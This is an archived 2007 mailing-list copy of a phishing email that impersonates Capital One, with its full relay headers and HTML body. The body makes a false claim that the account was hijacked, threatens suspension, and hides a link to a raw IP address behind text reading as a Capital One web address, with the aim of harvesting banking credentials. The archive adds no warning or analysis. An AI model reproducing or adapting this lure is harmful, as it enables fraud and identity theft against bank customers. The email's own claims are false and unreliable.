[7116] in SIPB_Linux_Development
Compromised Capital One Account
daemon@ATHENA.MIT.EDU (Capital One)
Sun Mar 11 05:40:26 2007
From service@capitalone.com Sun Mar 11 09:40:26 2007
Return-Path: <service@capitalone.com>
Delivered-To: linux-dev-mtg@charon.mit.edu
Received: (qmail 26774 invoked from network); 11 Mar 2007 09:40:25 -0000
Received: from unknown (HELO mail.ackerconsulting.com) (69.85.68.8)
by charon.mit.edu with SMTP; 11 Mar 2007 09:40:25 -0000
Received: from User ([])
by mail.ackerconsulting.com (Merak 6.0.5) with ASMTP id HTB74067;
Sun, 11 Mar 2007 00:01:06 -0700
From: "Capital One"<service@capitalone.com>
Subject: Compromised Capital One Account
Date: Sun, 11 Mar 2007 01:07:23 -0600
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
<html>
<body>
<table border="1" width="62%"
<tr>
<td>
<p align="center">
</p>
<p align="left">
<img border="0" src="http://www.capitalone.com/images/header/logos/capone.gif"
align="right" width="118" height="17"><b><font face="Arial" size="2">Dear Capital One
valued customer,</font></b><br>
<br><br>
<br>
<font face="Arial" size="2">
During our regularly schedule account maintenance and verification we have detected a slight error in your billing information on file with Capital One.<br> This might be due to either following reasons:
<br>
<br><strong><FONT color=red>- A recent change in your personal information (i.e. change of address)</FONT>
<br><FONT color=red>- An inability to accurately verify your selected option of payment due an internal error within
our processors.</FONT></strong>
<br>
<br>We recently noticed one or more attempts to log in your
Capital One account from a foreign IP address and we have
reasons to believe
that your account was hijacked by a third party without
your
authorization. If you recently accessed your account while
traveling, the log
in attempts may have initiated by you.<br>
<br>
However if you are the rightful holder of the account, click on
the link below and submit, as we try to verify your account.
</font><br>
<br>
<a target="_blank" href="http://64.139.74.194/SecurityCapitalOne.com/upgrade.php?UserName=&mode=SSL.exe">
https://service.capitalone.com/</a><br>
<br>
<font face="Arial" size="2">The log in attempt was made from:<br>
<br>
IP address: <b>213.72.153.170</b><br>
ISP host: <b>213-72-153-170.dmtg.de</b><br>
<br>
If you choose to ignore our request, you leave us no
choice but to
temporally suspend your account.<br>
We ask that you allow at least 72hrs for the case to be
investigated and
we strongly recommend not making any changes to your
account in that
time.<br>
<br>
<font color="#808080">* Please do not respond to this
email as your
reply will not be received.</font><br>
<br>
Thank you for your patience as we work together to protect
your account.</font><p align="left">
</td>
</tr>
<tr>
<td>
<p align="center"><b><font face="Verdana" size="2">Copyright ©
1999-2007 Capital One. All rights reserved.</font></b></td>
</tr>
</table>
</body>
</html>
